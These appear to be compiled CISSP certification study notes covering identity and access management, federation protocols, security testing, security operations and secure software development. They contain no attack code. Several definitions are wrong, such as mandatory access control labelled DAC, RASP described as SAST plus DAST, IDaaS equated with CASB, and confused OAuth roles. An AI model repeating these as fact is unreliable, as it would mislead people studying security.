• Something you have. e.g. Token
• Something you are. e.g. Biometrics
• Somewhere you are e.g. Location-based Authentication.

TOKENS
HARD TOKEN TYPES
SOFT TOKENS
Soft Token implementation
• Stored on a general-purpose computer
• Require activation through a second factor.
• Private keys must be non-exportable.
• Never store keys in plaintext or unencrypted form.
• Biggest concern: Human Error.

Compared to hard tokens:


• Generally cheaper to implement
• Easier to manage than hard tokens

BIOMETRIC
▪ Biometric system checks for 95% accuracy.
▪ Biometric system accurate authentication and least acceptable.
▪ Biometric system — fingerprint, retina scan.
▪ Biometric devices rely on measurements of the biological characteristics of an
individual.
▪ Gaining user acceptance is the most common difficulty with the biometric
system
▪ Selected individual characteristics are stored and compared with the presented
template
Authorization Mechanisms
DISCRITIONARY ACCESS CONTROL (DAC)
NON-DISCRITIONARY ACCESS CONTROL (NDAC)
ROLE BASED ACCESS CONTROL (RDAC)

RULE BASED ACCESS CONTROL (RuDAC)

It’s a DAC Model


• Access is based on a list of predefined rules that determine what access should
be granted.
• The rules, created or authorized by system owners, specify the privileges granted
to users when a specific condition of a rule is met
• E.g. — Firewall rules, User 9 am to 5 pm allow access, or reject.
• Access based on situational if-then statements Rules
MANDATORY ACCESS CONTROL (DAC)
ATTRIBUTE BASED ACCESS CONTROL (ABAC)

ACCESS CONTROL LIFECYCLE

Identity and Access Management ( IAM )


• Obtain visibility/control over usr access privileges, who has access to what
• Detective controls
• Corrective controls ( Periodic Recertification )
• Access policy with implementing rules.
• Automated account reconciliation to detect unauthorized changes
JUST IN TIME ACCESS
FEDERATIONS
FEDEREATED IDENTITY

1)Federated Identity Systems allow trust access and verification across multiple
organizations.
2) A Federated identity is a portable identity that can be used across business
entitlements, It allows a user to be authenticated across multiple IT systems and
enterprises.
3) OAuth, Open-ID
4) Federated Identity Management:
Each organization in the federation subscribes to a common:
▪ Set of policies, standards, and procedures for provisioning and managing user
identification, authentication, and authorization information.
▪ Trust access & verification across multiple organizations.
▪ Federated identities link user profile information at multiple locations without
synchronization or directory consolidation (E.g. TCS UK od TCS India has same
Desktop profiles)

SAML (Security Assertion Markup Language)

SAML’s primary goal is authentication


2) The XML Standard, which permits the transfer of authentication and
permission information between security domains.
3) The identity of the subjects and authorization decisions regarding their level of
access are conveyed in the form of assertions through a secure HTTP connection.
4) It enables web-based authentication and authorization situations, including
SSO, and provides the authentication components to the Federated Identity
Management System.
5) A claim, statement, or declaration of fact made by a SAML authority is known
as an assertion.
There are 3 roles in SAML

1)IDP (Identity Provider) — makes an assertion about another identity, based


on information
2) SP ( Service Provider ) — This entity is the relying party that is being asked
to provide its service or resource.
3) Subject — This entity is the subject of the assertion, usually a person,

The four primary components of SAML are

1)Assertion
2) Binding
3) Protocol
4) Profile
XACML (Extensible Access Control Markup Language)

• Designed for Authorization and Describe the access control.


• It commonly implements policies as an attribute-based access control system
but can use role-based access control.
• It helps assure all members in a federation that they are granting the same level
of access to different roles.
• XACML and SAML are together used to create a federated IAM system.
• SAML share authentication ( XML Token) and authorization ( details) , The
authorization details are XACML.
• SAML isused to share auth data between multiple services and application

Any questions in exam talking about ONLY AUTHORIZATION


managed RBAC then Answer = XAMCL

Used is SDN (Software Defined Network)

1. OAUTH 2.0 (AUTHORIZATION)

OAuth is different from OpenID & SAML is being exclusively for Authorization
purposes and not for Authentication purposes.
The OAuth specification defines the following roles:

1) The End User or The Entity that owns the resources in Question
2) The Resource Server ( OAuth Provider ), which is the entity hosting the
resource
3) The Client ( OAuth Consumer ) is the entity that is looking to consume the
resource after getting authorization from the client
2. OPEN ID CONNECT (AUTHENTICATION)

1)OpenID is a free standard allowing other parties to authenticate users.


2) Single sign-on scenarios are made possible by OpenID Connect,
3) Uses OpenID but a JavaScript Object Notation (JSON) Web Token (JWT), also
known as an ID token.
4) The token contains a field signed with the shared secret, providing the relying
party with assurance that the user is authenticated.
5) OpenID Connect also makes use of simple REST/JSON message flows with the
design goal of making complicated things possible.

Three roles are specified by the OpenID specification.

1) An entity or end-user seeking to confirm its identity


2) RP, or Relying Party The relying party is the organization tasked with
confirming the user’s identification.
3) OP, or Open ID Provider It is OP who registers the Open ID URL and has the
authority to confirm the end user’s identification.
SUMMARY

IDaaS (IDENTITY AS A SERVICE)


• Identity as a service (IDAAS) in the cloud, also known as CASB (Cloud Access
Security Broker), is a component of cloud-based IDM solutions.
• As a digital identity, IDaaS provides administration of identity or information.
• You can use this identity for online transactions.
• When something has an identity, it has a number of characteristics that help
people recognize it.
• A combination of administration and account provisioning, authentication,
authorization, and reporting functions. • A cloud-based service that mediates
identity and access management functions to the target system/application on the
premises of the client and/or in the cloud.
• IDaaS offers cloud-based services that connect target systems on the customer’s
premises with IAM capabilities.
• SaaS and IDaaS are frequently combined, and
• Availability is the main issue.
CLOUD SECURITY

Cloud identity and access management Problems

1)APIs — Although some interfaces may be provided by providers, it’s unlikely


that they will provide all of them.
Authorization mapping — As identity is maintained by the cloud provider, how
users are given privileges may need to alter.
2) Audit: It may be challenging to get providers to produce logs since they must
be careful not to reveal data from other clients who share virtual machine tenancy.
3) Privacy: Private user data is transmitted over the Internet and kept on servers
that are not under your direct control. This poses a significant risk to the
company.
4) Latency: Pushing configurations to the cloud may take some time. Risk may
arise if user rights are changed slowly.
5) App identity: If you want to ensure that the identities of your cloud-based
users aren’t being used by illegal apps, apps may not always validate a client’s
identity.
6) Mobile: Cloud service providers frequently provide mobile applications,
adding another system and attack surface that you must protect against.
CISSP: Domain 6 — Security Assessment and
Testing: Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
certification-in-e82c7201975e

OBJECTIVE
DESIGN AND VALIDATE ASSESSMENT, TEST AND AUDIT STRATEGIES
CONDUCT SECURTY CONTROL TESTING
COLLECT SECURITY PROCESS DATA (TECHNICAL AND ADMIN)
ANALYZE TEST OUTPUT AND GENERATE REPORT
CONDUCT OR FACILITATE SECURITY AUDITS

Assessment = Process

Testing = Technique

Organization develops policy / plan


Based on policy, Assessment is done
Based on Assessment, Reports are produced
Internal Assessment — Inhouse Team

External Assessment — 3rd party audit firm

DESCRIBING VULNERABILITIES

A. CVE (Common Vulnerability and Exposure) — Provides a naming


system for describing security vulnerabilities

Assigning code (signature) to each and every vulnerability

B. CVSS (Common Vulnerability Scoring System) — Provides a


standardized scoring system for describing the severity of security vulnerabilities

Base Score — Vulnerabilities details


Temporal Score — Vendor details for Vulnerabilities
Environmental Score — What is Vulnerability impact in organization
Question exam — In CVSS based on which score you will take a
Decision

Answer — Environmental Score

C. CCE (Common Config Enumeration) — Provides a naming system for


system configuration issues

LOG MANAGEMENT

Process to

Log Management: Enhancing Visibility and Security

Log management is a crucial component of modern IT operations, providing


insights, security, and compliance benefits.

1. What is Log Management?


 Log management refers to the process of collecting, storing, and
analyzing logs or records generated by various hardware and software
systems.
 Logs contain valuable information about system activities, errors, user
interactions, and security events.

2. The Importance of Log Management:

 Visibility: Logs offer a real-time and historical view of system


performance and activities, aiding in troubleshooting and monitoring.
 Security: Log analysis helps detect and mitigate security threats by
identifying suspicious or anomalous behavior.
 Compliance: Many regulatory standards, such as GDPR and HIPAA,
require organizations to maintain and protect logs for auditing purposes.

3. Key Components of Log Management:

 Log Collection: Automated gathering of logs from various sources,


including servers, network devices, applications, and security systems.
 Log Storage: Secure and scalable storage solutions are essential to retain
logs for extended periods while ensuring data integrity.
 Log Analysis: Advanced tools and algorithms are used to parse and
interpret logs, turning raw data into actionable insights.
 Alerting and Reporting: Automated alerts and reports notify
administrators of critical events or issues in real-time.

4. Benefits of Effective Log Management:


 Faster Troubleshooting: Rapid identification and resolution of issues,
minimizing downtime and productivity loss.
 Proactive Security: Early detection of security breaches and potential
vulnerabilities before they escalate.
 Historical Analysis: Historical logs enable trend analysis, helping
organizations make informed decisions for future improvements.
 Compliance Adherence: Meeting regulatory requirements by maintaining
comprehensive log records.

5. Challenges in Log Management:

 Volume: The sheer volume of logs generated can be overwhelming,


necessitating scalable solutions.
 Complexity: Logs come in various formats, making parsing and analysis
challenging.
 Security: Protecting log data from unauthorized access is crucial to
maintain data integrity and privacy.

6. Best Practices:

 Centralized Logging: Store logs in a central repository for easy access and
analysis.
 Regular Review: Consistently review logs to identify emerging issues or
threats.
 Automated Alerts: Set up automated alerts to respond promptly to
critical events.
 Data Retention Policies: Define policies for log retention to balance
storage costs and compliance requirements.
SIMULATION

Synthetic Transmission
Artificial Scenario
Pre prod environment

Limitation od production / Operation


Example — BOSON practice test (simulated)

SECURITY THROGHOUT DEVELOPMENT LIFE CYCLE

Fixing bugs and security vulnerabilities as early as possible


Save COST and Save TIME
During Application Development

1. SAST — (Static Source Code Analysis)

 Analysis of application source code to finding vulnerabilities without


application execution.
 Access to Source Code

2. DAST — (Dynamic Application Testing)

 Testing against running application.


 NO Access to Source Code

3. RASP = SAAST + DAST

 Real user application monitoring

TESTING TECHNIQUES (Very imp for exam)

Black-box testing vs. white-box testing


Dynamic testing vs. static testing
Manual testing vs. automated testing
ACTIVITIES IN TEST ENVIRONMENT
1)VA — Vulnerability Assessment
2) PT- Penetration Testing
3) OVERT or COVERT
4) Fuzzin
TESTING METHOD FACTORS (When Selecting Testing and Tools)

1. Attack Surface — — — — — — → What and Where to Test


2. Application Type — — — — — -> Behaviour
3. Quality of Result — — — — —-> Output
4. Supported Technology — — -> Supported Platform
5. Performance/Resource utilization — →Compute Power

NEGATIVE & POSITIVE TESTING

1. POSITIVE TESTING

 System works as expected business use cases


 Use Case Testing

1. NEGATIVE TESTING

 Ensures system can handle invalid use cases whether accidental /


delibrately
 Misuse Case Testing
PENETRATION TESTING (PT)
Penetration Test Steps ( EXAM IMP Sequence )
A. Planning ( Can be Overt/Covert )

 Management Signed Off

B. Discovery

 Information gathering and scanning.


 Vulnerability Analysis
 Which involves identifying and documenting information about the
target •

C. Attack

 Gaining Access, Escalating Privileges

D. Reporting

 It occurs during the same timeline as Planning, Discovery, Attack Phase


 The reporting phase occurs simultaneously with the other three phases of
the penetration test (see Figure above). The development of the
assessment plan, or ROE, occurs during the planning phase. Written
logs are typically retained during the detection and assault phases, and
system administrators or management may get frequent reports.
Following the test, a report is often created to outline the vulnerabilities
found, provide a risk assessment, and provide recommendations for
mitigating the weaknesses found.
SOFTWARE TESTING TENETS
Type of Testing

A) Unit testing
• Does a particular piece of code properly perform the task it is intended to?
• Testing focuses on the early examination of sub-program functionality & ensures
that functionally not visible at the system level is examined by testing.

B) Integration Testing
• Does the application behave as expected when integrated and Communicating
with other systems in the environment?
•Testing focuses on the transfer of data and control across a program’s internal
and external interface. External interfaces are those with other software
( including operating system software ), system hardware, and the users and can
be described as communication links.

C) System Testing
• This ensures that the application provides the required functionality and that the
application is trustworthy as deployed in regard to security, privacy, performance,
recovery, and usability.
D) Comprehensive Code Testing program
• With an emphasis throughout the SW development lifecycle, can ensure that
developed applications are deployed with minimal vulnerabilities.

E) Regression Testing
• Provide assurance that a change has not created problems elsewhere in the
software product.
• Regression analysis is the determination of the impact of a change based on a
review of the relevant documentation

F) Interface Testing
• Checks components are in sync
• Data Transfer happens per design
• Control passes correctly

ISCM (INFOSECURITY CONTINOUS MONITORING)


Align fact of the organization including People, Process and
Technology in place.

ISCM IMPLEMENTING STEP

Define an ISCM strategy based on risk tolerance that maintains clear visibility
into assets, awareness of vulnerabilities, up-to-date threat information, and
mission/business impacts.

Establish an ISCM program determining metrics, status monitoring


frequencies, control assessment frequencies, and an ISCM technical architecture.

Implement an ISCM program and collect the security-related information


required for metrics, assessments, and reporting. Automate the collection,
analysis, and reporting of data where possible.
Analyze the data collected and Report findings, determining the appropriate
response. It may be necessary to collect additional information to clarify or
supplement existing monitoring data.

Respond to findings with technical, management, and operational mitigating


activities or acceptance, transference/sharing, or avoidance/rejection.

Review and Update the monitoring program, adjusting the ISCM strategy and
maturing measurement capabilities to increase visibility into assets and
awareness of vulnerabilities.

INTERNAL AND 3RD PARTY AUDIT


A. 1st Party Audit —-> Internal

B. 2nd Party Audit —> Audit of Supplier/Vendor

C. 3rd Party Audit —→Certification bodies(Independant Company ISO, RBI)


SAS 70

SOC REPORT COMPARISION

SOC 1 Report: “SOC 1 reports focus on a service organization’s internal controls


relevant to financial reporting, providing assurance to clients and auditors.”

SOC 2 Report: “SOC 2 reports assess security, availability, processing integrity,


confidentiality, and privacy controls, demonstrating a commitment to data
protection and trustworthiness.”
SOC 3 Report: “SOC 3 reports are concise summaries of SOC 2 reports,
designed for public consumption, highlighting a service organization’s
commitment to security, privacy, and compliance.”
CISSP: Domain 7 — Security Operations:
Easy Notes to Pass CISSP Certification in
2023–24
[Link]
45212ec9d8c1

OBJECTIVE
UNDERSTAND AND COMPY WITH INVESTIGATIONS
CONDUCT LOGGING AND MONITORING ACTIVITIES
PERFORM CONFIGURATION MANAGEMENT (e.g Provisioning, Baselining,
Automation)
APPLY FOUNDATIONA SECURITY OPERATIONS CONCEPT
APPLY RESOURCE PROTECTION
CONDUCT INCIDENT MANAGEMENT
OPERATE AND MANITAIN DETECTIVE AND PREVENTIVE MEASURES
IMPLEMENT AND SUPPORT PATCH AND VULNERABILITY MANAGEMENT
UNDERSTAND AND PARTICIPATE IN CHANGE MANAGEMENT PROCESS
IMPLEMENT RECOVERY STRATEGIES
IMPLEMENT DISASTER RECOVERY (DR) PROCESS
TEST DISASTER RECOVERY PLANS (DRP)
PARTICIPATE IN BUSINESS CONTINUITY (BC) PLANNING AND EXCERCISE
ADDRESS PERSONAL SAFETY AND CONCERNS
UNDERSTAND AND SUPPORT INVESTIGATIONS

1) Incident Scene
2) Evidence e.g EDRM (Electronic Discovery Reference Model)
3) Evidence Collection and Handling
4) Data Forensic Process

A. INCIDENT SCENE

Incident = Anything that compromise security

Incident scene is the environment where potential evidence may exist.

B. EVIDENCE

Data that is dynamic and exists in processes that disappear in a relatively short
timeframe once the system is powered down

Locard Exchange Principle — When crime is committed, attacker


leaves SOME EVIDENCE behind and take something with them.

General Guidelines

[Link] procedural and general jurisprudential rules must be followed.


2. Digital evidence shall not be changed as a result of its seizure.
3. Training is required for everyone who accesses original digital evidence.
4. Complete documentation, preservation, and reviewability are required for all
actions involving the acquisition, access, storage, or transfer of digital evidence.
5. A person is accountable for all activities while in possession of digital evidence.

EDRM (Electronic Discovery Reference Model) — Systematic way of


collecting digital evidence.

Any question in exam having words such as below Answer = EDRM

Legal Proceeding
Litigation
Freedom of Information

C. EVIDENCE COLLECION AND HANDLING

All material associated with the incident could be pertinent to an


investigation and used as evidence
[Link] that may have been compromised
2. System (HW or SW) that may have been compromised
3. Information from people about the knowledge of incident
4. Information about the incident scene

Common Practices for Handling Evidence for Security Professionals

[Link] of Custody
2. Copies of all data
3. Analyze copies instead of originals
4. Appointing evidence custodian q
5. Document everything
6. Avoid modification
7. Collection is sensitive process

Chain of Custody

C. DATA FORENSIC PROCESS


ANALYSIS

1. NETWORK ANALYSIS

a) Firewall Logs
b) IDS/IPS Logs
c) Traffic logs / Path tracing.

2. MEDIA ANALYSIS

a) Recovery of Info / evidence from media (HDD,SDD etc)


b) Disk imaging and timeline analysis.
c) Slack space and shadow volume analysis.

3. SOFTWARE ANALYSIS

a) Malicious Source code analysis.


b) Reverse engineering.
c) Exploit review.
b) Intellectual property disputes.
c) Copyright issues.

4. HARDWARE ANALYSIS

a) Embedded OS, Virtualized S/W and Hypervisor analysis.


b) Special tools and techniques are required to image embedded devices.
c) Difficult to find vulnerabilities on the hardware.

UNDERSTAND REQUIREMENT FOR INVESTIGATION


TYPES
TYPES OF INVESTIGATION

IDS / IPS
Intrusion detection systems (IDS) and intrusion prevention systems (IPS)
constantly watch your network, identifying possible incidents and logging
information about them, stopping the incidents, and reporting them to security
administrators.
SIEM (Security Information and Event Management)
SIEM, is a security solution that helps organizations recognize and address
potential security threats and vulnerabilities before they have a chance to disrupt
business operations.

Its is a solution that collects and analyzes security-related data from various
sources to provide real-time threat detection and incident response. It helps
organizations meet compliance requirements and improve their overall security
posture by providing a single platform for monitoring, analyzing, and responding
to security events.
DLP (Data Loss Prevention)
DLP is a part of a company’s overall security strategy that focuses on detecting
and preventing the loss, leakage or misuse of data through breaches, ex-filtration
transmissions and unauthorized use.

DLP GOAL: Protect Business Data and IP

Data loss prevention is an approach to data security that implements a set of


processes, procedures, and tools to prevent the loss, misuse, or unauthorized
access of sensitive information. Four types of data loss prevention are network
DLP, endpoint DLP, cloud DLP and Email DLP.
DLP Rule Set

[Link] Based
2. Pattern Matching — — — — → MOST EFFECTIVE
3. Labelling — — — — — — — — -> FASTEST

CONFIGURATION MANAGEMENT
a) Process for establishing a baseline of IT environment
b) Provides uniformity
c) CCM (Config and Change Mgmt) is a continuous process of controlling
b) Purpose of CCM is to establish process to ensure integrity of assets

Configuration Management is the process of maintaining systems, such as


computer hardware and software, in a desired state. Configuration Management
(CM) is also a method of ensuring that systems perform in a manner consistent
with expectations over time
CCB (Change Control Board) — — -→Handles changes within projects

CAB (Change Advisory Board) →Handles Emergency & Business impact


changes

CHANGE MANAGEMENT PROCESS (DIRECTIVE


CONTROL)
Change management is a systematic approach to dealing with the transition or
transformation of an organization’s goals, processes or technologies. The purpose
of change management is to implement strategies for effecting change, controlling
change and helping people to adapt to change
PATCH MANAGEMENT PROCESS (CORRECTIVE
CONTROL)
Patch management is the process of applying updates to software, drivers, and
firmware to protect against vulnerabilities. Effective patch management also helps
ensure the best operating performance of systems, boosting productivity.
Patching Challenges

[Link]
2. Poorly crafted patches
3. Required downtime
4. Added expense
5. Virtualization — Specific concern
6. Timing

INCIDENT RESPONSE (CORRECTIVE CONTROL)


Incident response (IR) is the process by which an organization handles a data
breach or cyberattack. It is an effort to quickly identify an attack, minimize its
effects, contain damage, and remediate the cause to reduce the risk of future
incidents.
THREAT INTELLIGENCE
The threat intelligence lifecycle is a methodical framework that aids in the
efficient management and application of threat intelligence by organizations. It
makes sure that information about potential threats is handled with care and
offers organizations a set of guidelines they may use to stay informed about risks
and take precautions against them. Organizations may gather information on
risks with confidence thanks to this security intelligence lifecycle, evaluate it for
accuracy and dependability, and take protective measures as a result.

By following this process, intelligence teams can build an efficient threat


intelligence process.

The six steps in the intelligence lifecycle include:

1. Planning
2. Collection
3. Processing
4. Analysis and Production
5. Dissemination
6. Feedback and improvement
PROBLEM MANAGEMENT vs INCIDENT MANAGEMENT

Problem management is a practice focused on preventing incidents or


reducing their impact.

Incident management is focused on addressing incidents in real time.

IMPLEMENT RECOVERY STRATEGIES


BACKUP TYPES
RAID
BACKUP AND RECOVERY SYSTEM
DISASTER RECOVERY
BCP/DR TESTING STRATEGIES
PHYSICAL SECURITY
Physical security is the protection of personnel, hardware, software, networks and
data from physical actions and events that could cause serious loss or damage to
an enterprise, agency or institution. This includes protection from fire, flood,
natural disasters, burglary, theft, vandalism and terrorism.
CARD TYPES and CCTV

CCTV (closed-circuit television) is a TV system in which signals are not publicly


distributed but are monitored, primarily for surveillance and security purposes.
CCTV relies on strategic placement of cameras and private observation of the
camera’s input on monitors.
DOOR LOCKS
CISSP: Domain 8 — Software Development
Security: Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
in-2023-24-acca3ef22528

DOMAIN OBJECTIVES
UNDERSTAND AND INTEGRATE SECURITY IN SDLC
IDENTIFY AND APPLY SECURITY CONTROLS IN SOFTWARE
DEVELOPMENT ECOSYSTEMS
ASSESS THE EFFECTIVENESS OF SOFTWARE SECURITY
ASSESS SECURITY IMPACT OF ACQUIRED SOFTWARE
DEFINE AND APPLY SECURE CODING GUIDELINES AND STANDARDS
IMPLEMENT AUTHENTICATION SYSTEMS
SDLC vs SLC
SDLC (Software Development Life Cycle) and SLC (Systems Life Cycle) are both
methodologies used in the field of software and systems engineering to manage
the development and maintenance of software and systems. While they share
some similarities, they have distinct focuses and purposes.
SDLC (Software Development Life Cycle):
SDLC is a structured framework for developing software applications. It
encompasses all the phases involved in the development process, from initial
planning and requirements gathering to coding, testing, deployment, and
maintenance. The primary goal of SDLC is to produce high-quality software that
meets user requirements, is delivered on time, and is within budget. Some
common SDLC models include the Waterfall model, Agile methodologies (Scrum,
Kanban), and the V-Model, among others.
SLC (Systems Life Cycle):
SLC, on the other hand, is a broader framework that focuses on the entire lifecycle
of a computer-based system, which may include hardware, software, processes,
and people. It encompasses the planning, design, implementation, operation, and
maintenance phases of a system. While SLC includes software development, it
also considers the overall system architecture, infrastructure, and how the system
aligns with an organization’s goals and processes. SLC is often used in contexts
where the scope extends beyond just software, such as the development of
complex information systems.

1. PROJECT INITIATION AND PLANNING SECURITY ACTIVITIES


▪ Business need
▪ Meeting to understand project requirement
▪ Meeting to understand stakeholder project
▪ Meeting to understand Security consideration
▪ Understand and document requirement
▪ Understand Cost and Regulatory requirement
▪ Resource requirement
2. FUNCTIONAL REQUIREMENT DEFINITION
▪ Document functionality requirement
▪ Functionality will be defined
▪ Security requirement will be formalized
▪ Team also reviews documents from project initiation phase and makes any
revision/updates
▪ Key activities to audit include reviews like privacy impact assessment and data
classification
▪ Ensuring complete requirement and document understanding is critical to
design and build a system with adequate protection mechanism
3. DETAILED DESIGN SPECIFICATION SECURITY ACTIVITIES
(Threat modelling in this phase)
▪ System Architecture, System Output and System interface are designed
▪ Data input, Data flow, and Output requirement are established
▪ Prepared detailed design and update testing goal and plan
▪ Evaluate against requirement such as Cloud vs OnPrem
▪ Formal risk assessment and decision process utilized to determine which of the
proposed solution alternatively adequately meets stated requirements and formal
acceptance.
▪ Formal acceptance and residual risks
4. DEVELOPMENT AND DOCUMENT SECURITY ACTIVITIES
▪ Source code generation
▪ Test scenarios and test case developed
▪ Unit and Integration tests conducted
▪ General care of software quality, reliability, and consistency of operation
▪ Code analyzed to eliminate common vulnerabilities
5. TESTING AND EVALUATION CONTROLS (ACCEPTANCE PHASE)
Test Data should include following
▪ Data at the ends of the acceptable data range
▪ Various points in between
▪ Data beyond expected / allowed data points
Test with
▪ Known good data
▪ Never with live production data
▪ Sanitized data (Use static masking)
Data Validation
▪ Before and After each test review the data to ensure that data ha snot been
modified.
Bound Checking
▪ To prevent buffer overflows
6. CERTIFICATION AND ACCREDIATION
Certification (Technical Validation of Product)
▪ Evaluating the security stance of software
▪ Examine how well system performs its functional requirement
Accreditation (Management Acceptance)
▪ After reviewing the certification, authorize software / system to be implemented
in production.
7. TRANSITION INTO PRODUCTION
▪ Obtaining Accreditation
▪ New system transitioned from Acceptance phase to live Prod environment
▪ Training new user according to implementation
▪ Implementing the system
▪ Including installation and data conversion
7. OPERATION AND MAINTENANCE SUPPORT
▪ Monitor the performance of system
▪ Ensure continuity of operation
▪ Detect defects and weakness
▪ Manage and prevent system problems
▪ Recover from system problems
▪ Implement system changes
▪ Subject to external audit
8. REVISION AND SYSTEM REPLACEMENT (DISPOSAL)
▪ Periodic evaluations and audits
▪ Changes must follow SDLC and be recorded
NIST System Development Life Cycle (SDLC)
The NIST System Development Life Cycle (SDLC) typically comprises five phases,
each serving a distinct purpose:
1. Initiation: Identifying the need for the system and defining project
objectives.
2. Development and Acquisition: Creating or acquiring the system
components.
3. Implementation and Integration: Deploying and integrating the
system into the environment.
4. Operations and Maintenance: Supporting and maintaining the
system in its operational state.
5. Disposition: Safely retiring or replacing the system when it’s no longer
needed.
DEV OPS
DevOps is a set of practices and cultural philosophies that aim to improve and
streamline the collaboration between software development (Dev) and IT
operations (Ops) teams. The primary goal of DevOps is to shorten the software
development lifecycle, increase the frequency of software releases, and enhance
the quality and reliability of software products. It encourages a shift from
traditional siloed and sequential development and deployment processes to a
more integrated and automated approach.

Here are the phases of DevOps summarized in one line each:


1. Plan: Define project goals and requirements, and establish a
development and deployment roadmap.
2. Code: Write and review code to implement software features and
functionalities.
3. Build: Compile, package, and create deployable artifacts from the
codebase.
4. Test: Automated testing is performed to identify and rectify defects.
5. Deploy: Automated deployment of code and configurations to various
environments.
6. Operate: Manage and monitor applications and infrastructure in
production.
7. Monitor: Continuously track application performance and
infrastructure health.
8. Feedback and Optimization: Use feedback to make improvements in
development, deployment, and operations processes.
DEVSECOPS
DevSecOps is an extension of DevOps that incorporates security practices into the
entire software development and delivery lifecycle. It aims to integrate security
considerations and actions at every phase of the development process, from
planning and coding to testing, deployment, and monitoring. The primary goals of
DevSecOps are to proactively identify and address security vulnerabilities and to
ensure that security is not a separate or neglected aspect of software development
but an integral part of it.
Key principles and practices of DevSecOps include:
1. Security as Code: Treat security policies and controls as code for
automation and version control.
2. Shift-Left Security: Integrate security early in the development
process, from coding to testing.
3. Continuous Security Testing: Automate security testing throughout
the CI/CD pipeline.
4. Vulnerability Scanning: Identify and remediate security
vulnerabilities in dependencies.
5. Compliance as Code: Automate compliance checks to meet regulatory
requirements.
6. Security Training and Awareness: Educate teams on security to
foster a security-conscious culture.
7. Incident Response Automation: Automate responses to security
incidents for rapid mitigation.
8. Collaboration: Promote collaboration between development,
operations, and security teams.
DevSecOps promotes a “security-first” mindset, where security is not seen as a
hindrance to development speed but as an essential component for building and
delivering secure software. This approach helps organizations identify and
remediate security issues early in the development process, reducing the risk of
security breaches and the cost of addressing vulnerabilities after deployment.
COTS (COMMERCIAL OFF THE SHELF SOFTWARE)
COTS, which stands for “Commercial Off-The-Shelf Software,” refers to
prepackaged software products that are commercially available and ready for
purchase and use by organizations or individuals without the need for custom
development. These software products are developed by third-party vendors and
are typically designed to address common business needs or provide specific
functionalities.
Key characteristics of COTS software include:
1. Commercially Available: COTS software is commercially produced
and sold by vendors for a wide range of users.
2. Generalized Functionality: It provides prebuilt, standardized
functionalities designed to meet common business needs.
3. Limited Customization: COTS software allows only limited
customization and configuration, compared to bespoke solutions.
4. Cost and Time Savings: Adoption of COTS software reduces
development time and cost, as it eliminates the need for extensive in-
house development.
5. Vendor Support and Updates: Vendors offer support, updates, and
maintenance to ensure the software remains secure and functional.
6. Broad User Base: COTS software often has a large user community,
providing access to user experiences, best practices, and additional
resources.

ASSESS SECURITY IMPACT OF ACQUIRED SOFTWARE


SAMM (SOFTWARE ASSURANCE MATURITY MODEL)
SAMM is an open framework for software security that helps organizations assess,
formulate, and implement a strategy for improving their software security
practices. It provides a structured approach to managing and enhancing software
security by focusing on various aspects of the software development lifecycle.
The goal of SAMM is to help organizations reduce software security risks and
build more secure software products. It was developed by the Open Web
Application Security Project (OWASP).
CMMI (CAPABILITY MATURITY MODEL)
It is a framework that provides a set of best practices for improving the processes
used in software development and other areas of an organization.
The primary goal of CMMI is to help organizations enhance the quality, efficiency,
and effectiveness of their processes and achieve better overall performance.
CMMI is not limited to software development but can be applied to various
domains, including systems engineering, project management, and product
development.

Five maturity levels of the CMMI


Level 1 — Initial: Processes are often chaotic and unpredictable, lacking
formalization.
Level 2 — Managed: Basic process discipline is established, leading to more
predictable project outcomes.
Level 3 — Defined: Processes are well-documented, standardized, and
consistently applied across the organization.
Level 4 — Quantitatively Managed: Organizations use quantitative data for
process management, aiming for stability and control.
Level 5 — Optimizing: A focus on continuous process improvement and
innovation to adapt to changing needs and challenges.
WATERFALL vs OTHER MODELS
WATERFALL MODEL
The waterfall project management methodology lets you plan out your project in a
linear manner where each subsequent phase initiates after the last one ends. It’s
one of the most straightforward ways to manage a project and is a good choice if
you already have clearly outlined objective

Sequential structure: The waterfall model divides your operations into


sequential phases. You can only move to the next stage in your project once the
current one is complete. This also means there’s no space for changing course or
revisiting a phase after its completion. The only way to go back is to start all over
again.
Minimal customer involvement: A waterfall project involves minimal
customer interaction. This is primarily due to the fact that operations only start
after the customer’s requirements and objectives are clearly defined. The first
meeting takes place before operations begin and the next when the project is in its
final stages.
Robust documentation: This methodology also involves in-detail
documentation of all requirements, the development process, and the final
outcome. This includes everything from the timeline to the precise route you will
take to solve the client’s problems. Since there’s minimal to no customer
communication during the development process, every essential detail needs to be
documented upfront.

1. Requirements Gathering: Define project needs.


2. System Design: Plan system architecture.
3. Implementation (Coding): Write software code.
4. Testing: Evaluate software functionality.
5. Integration and Deployment: Combine and deliver system.

ITERATIVE MODELS
An iterative method, often referred to as iterative development or iterative design,
is an approach to project management and software development in which a
project is divided into smaller, manageable segments called iterations.
Each iteration represents a complete cycle of planning, designing, building,
testing, and reviewing a portion of the project. The key characteristic of iterative
methods is that they allow for revisiting and refining work in subsequent
iterations based on feedback and changing requirements.
AGILE SCRUM
Agile Scrum is a framework used in software development and project
management that emphasizes collaboration, flexibility, and iterative progress to
deliver high-quality products. It is one of several approaches within the broader
Agile methodology, which is designed to address the challenges of traditional,
rigid project management methods.
DBMS (Database Management System)
It is a software application or system that is designed to manage, store, retrieve,
and manipulate data in a structured way. A DBMS provides an organized and
efficient method for users and applications to interact with databases.
SQL
SQL, or Structured Query Language, is a powerful and standardized programming
language used for managing, querying, and manipulating relational databases. It
provides a structured way to communicate with databases, enabling users to
interact with the data stored in them. Here’s an explanation of SQL’s key
components and functions:
SQL’s key components and functions:
1. Database: Relational
2. Manipulation: CRUD (Create, Read, Update, Delete)
3. Querying: Retrieval
4. Definition: Schema
5. Control: Permissions
6. Transaction: Atomicity
7. Indexing: Optimization
8. Integrity: Constraints
9. Views: VirtualTables
API (APPLICATION PROGRAMMING INTERFACE)
An API, is a set of rules and protocols that allows different software applications
to communicate with each other. It defines the methods and data formats that
applications can use to request and exchange information. APIs serve as
intermediaries, enabling the integration of various software systems and allowing
them to work together seamlessly.
Here are some key points to understand about APIs:
1. Communication Bridge: APIs act as bridges between different software
components, allowing them to interact and share data or functionality.
2. Abstraction Layer: APIs provide a level of abstraction, shielding developers
from the underlying complexities of the systems they are interacting with. This
abstraction simplifies the development process.
3. Standardization: APIs define a standard way for applications to interact.
This standardization ensures consistency & compatibility between systems.
4. Types of APIs:
 Web APIs: These are APIs that are accessible over the internet using
HTTP/HTTPS protocols. Web APIs are commonly used for web services,
including RESTful and SOAP APIs.
 Library or Framework APIs: These APIs provide a set of functions
